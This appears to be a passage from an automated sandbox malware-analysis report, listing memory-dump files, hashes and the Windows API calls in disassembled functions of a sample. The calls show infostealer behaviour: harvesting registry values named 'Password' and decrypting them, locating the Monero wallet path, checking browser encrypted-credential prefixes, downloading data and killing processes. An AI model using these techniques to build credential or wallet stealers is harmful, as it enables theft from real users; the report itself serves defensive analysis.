                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 35b8177573895280e4e666a742ae584a5f3da1b76cd9852c1978866351352e78
                          • Instruction ID: dc0df9acb425fb3b69b49848817053a6512197e6337db1cf745b53311790ef03
                          • Opcode Fuzzy Hash: 35b8177573895280e4e666a742ae584a5f3da1b76cd9852c1978866351352e78
                          • Instruction Fuzzy Hash: AE619C70714614DBDB2ACF5CCC96E6EB3BAEF84304B244A1DE492DB781D731AD808B95
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE07D
                          • lstrcat.KERNEL32(?,?), ref: 003BE098
                          • lstrcat.KERNEL32(?,?), ref: 003BE0AC
                          • lstrcat.KERNEL32(?,00F1A5F8), ref: 003BE0C0
                          • lstrcat.KERNEL32(?,?), ref: 003BE0D4
                          • lstrcat.KERNEL32(?,00F2DB20), ref: 003BE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003BE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 1ddce73a9633f74054fdfd430123c1ecfe7d9f16f4f17ab9d4edbc8c50faf5fd
                          • Instruction ID: b6d7e9fb0803db0badd3a502d61e4ef5e7f91fac0dcb561110f8a24e65071b45
                          • Opcode Fuzzy Hash: 1ddce73a9633f74054fdfd430123c1ecfe7d9f16f4f17ab9d4edbc8c50faf5fd
                          • Instruction Fuzzy Hash: 0C418071911118EBCB26EB68DC49ADE73B4FF58300F1449A6F60A97651EF309F858F90
                          APIs
                            • Part of subcall function 003A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003A7805
                            • Part of subcall function 003A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003A784A
                            • Part of subcall function 003A77D0: StrStrA.SHLWAPI(?,Password), ref: 003A78B8
                            • Part of subcall function 003A77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003A78EC
                            • Part of subcall function 003A77D0: HeapFree.KERNEL32(00000000), ref: 003A78F3
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003A7A90
                          • lstrcat.KERNEL32(00000000,?), ref: 003A7ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 003A7ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 003A7AF0
                          • wsprintfA.USER32 ref: 003A7B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A7B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A7B47
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003A7B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: 03e08b40ca113f25b61c9871990e922cbc9e25976e0ceb0ea62fcc9eb898e7b2
                          • Instruction ID: 9c808b0c7ff5531a3260a59cadc25f13ce67939da7815450855fa6eb419af750
                          • Opcode Fuzzy Hash: 03e08b40ca113f25b61c9871990e922cbc9e25976e0ceb0ea62fcc9eb898e7b2
                          • Instruction Fuzzy Hash: B131D672A15214EFCB22DBA8EC89DAFB779EB95700F19051BE50593300DB70ED05DBA0
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8243
                          • lstrlen.KERNEL32(00000000), ref: 003B8260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8297
                          • lstrlen.KERNEL32(00000000), ref: 003B82B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B82EB
                          • lstrlen.KERNEL32(00000000), ref: 003B8308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8337
                          • lstrlen.KERNEL32(00000000), ref: 003B8351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8380
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 4acf0a6d10d83bde3f4ce200a260101559f743851bd76ccd0cbff0630a458044
                          • Instruction ID: 3585aa113cb625acc8da6c6087cc8bc64a7788704cefe4a277761d3df39d9324
                          • Opcode Fuzzy Hash: 4acf0a6d10d83bde3f4ce200a260101559f743851bd76ccd0cbff0630a458044
                          • Instruction Fuzzy Hash: E4519179A016129BDB16DF68D858AABB7F8EF01700F114515EE0ADBA44EF30ED61CBD0
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003A7805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003A784A
                          • StrStrA.SHLWAPI(?,Password), ref: 003A78B8
                            • Part of subcall function 003A7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 003A775E
                            • Part of subcall function 003A7750: RtlAllocateHeap.NTDLL(00000000), ref: 003A7765
                            • Part of subcall function 003A7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003A778D
                            • Part of subcall function 003A7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003A77AD
                            • Part of subcall function 003A7750: LocalFree.KERNEL32(?), ref: 003A77B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003A78EC
                          • HeapFree.KERNEL32(00000000), ref: 003A78F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 003A7A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: b04dfc0ddc6560281cd2eb053431dbb1331da3dc03efa3e823135ee3c5f75e85
                          • Instruction ID: cec79b558d1c4d519a8c8824836f1c0d24e7cf7d6e77e98c516a43cbe4917b9c
                          • Opcode Fuzzy Hash: b04dfc0ddc6560281cd2eb053431dbb1331da3dc03efa3e823135ee3c5f75e85
                          • Instruction Fuzzy Hash: AD7121B1D0021DABDB11DF95DCC5AEEB7B9EF55300F10456AE609A7200EB356E89CB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003A1135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003A1159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003A1173
                          • RegCloseKey.ADVAPI32(?), ref: 003A117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 003A114F
                          • wallet_path, xrefs: 003A116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: ecca285b25133e37a27704a24dad3d25f89429d3bb2c680ca415e9e527dca52e
                          • Instruction ID: 8dce9abdb705e365fbb28c9c529109eb052c23131b8d742a4d58da8b0c62a3ed
                          • Opcode Fuzzy Hash: ecca285b25133e37a27704a24dad3d25f89429d3bb2c680ca415e9e527dca52e
                          • Instruction Fuzzy Hash: F3F03075741309BFE7209BE0AC4DFEA7B7CEB14715F100157FE05E2290E6B05A4897A0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 003A9E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 003A9E42
                          • LocalAlloc.KERNEL32(00000040), ref: 003A9EA7
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • lstrcpy.KERNEL32(00000000,003D4C48), ref: 003A9FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: a78480f4075a621ecc29dfe7af731fbcbb0e3e9f6f288d06e64d44d62cdacad1
                          • Instruction ID: 88d14732f2991823d73c35d6c505e2c799108c0e59ef3143dc983941dfdb16d4
                          • Opcode Fuzzy Hash: a78480f4075a621ecc29dfe7af731fbcbb0e3e9f6f288d06e64d44d62cdacad1
                          • Instruction Fuzzy Hash: 1D51D231A10209AFCB22EF68EC85B9F77A8EF51315F15402AF949EF251DB70ED158B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003A565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A5661
                          • InternetOpenA.WININET(003CCFEC,00000000,00000000,00000000,00000000), ref: 003A5677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 003A5692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003A56BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 003A56E1
                          • InternetCloseHandle.WININET(?), ref: 003A56FA
                          • InternetCloseHandle.WININET(00000000), ref: 003A5701
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 54ea1e6a4fd213f021be01f2e9ec4ebe1c3bdca964d6632119f666c588d0c1f5
                          • Instruction ID: 3a0ef64accfbc3c5f0af3dd7200d0ac3609d9288703d45daefa85936df9527eb
                          • Opcode Fuzzy Hash: 54ea1e6a4fd213f021be01f2e9ec4ebe1c3bdca964d6632119f666c588d0c1f5
                          • Instruction Fuzzy Hash: 0F419170A01605EFDB25CF54DC88FAAB7B4FF49301F15806AE908EB2A0D7719945CB94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003C4759
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C4769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003C47AB
                          • CloseHandle.KERNEL32(00000000), ref: 003C47B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C47C0
                          • CloseHandle.KERNEL32(00000000), ref: 003C47CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 38354ef67044e10e6cf43699fcbaf35bc291bcc20b14f0f93241daac14452a7b
                          • Instruction ID: bac96425cd33d8c64689fabf4cdb2fa78830a954ca5ba921201b1af28796e179
                          • Opcode Fuzzy Hash: 38354ef67044e10e6cf43699fcbaf35bc291bcc20b14f0f93241daac14452a7b
                          • Instruction Fuzzy Hash: BA01B571602215ABE7315B60AC8DFEA77BCEB58752F040187F905D1180EF748D889B60
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B8435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B846C
                          • lstrlen.KERNEL32(00000000), ref: 003B84B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B84E9
                          • lstrlen.KERNEL32(00000000), ref: 003B84FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B852E
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
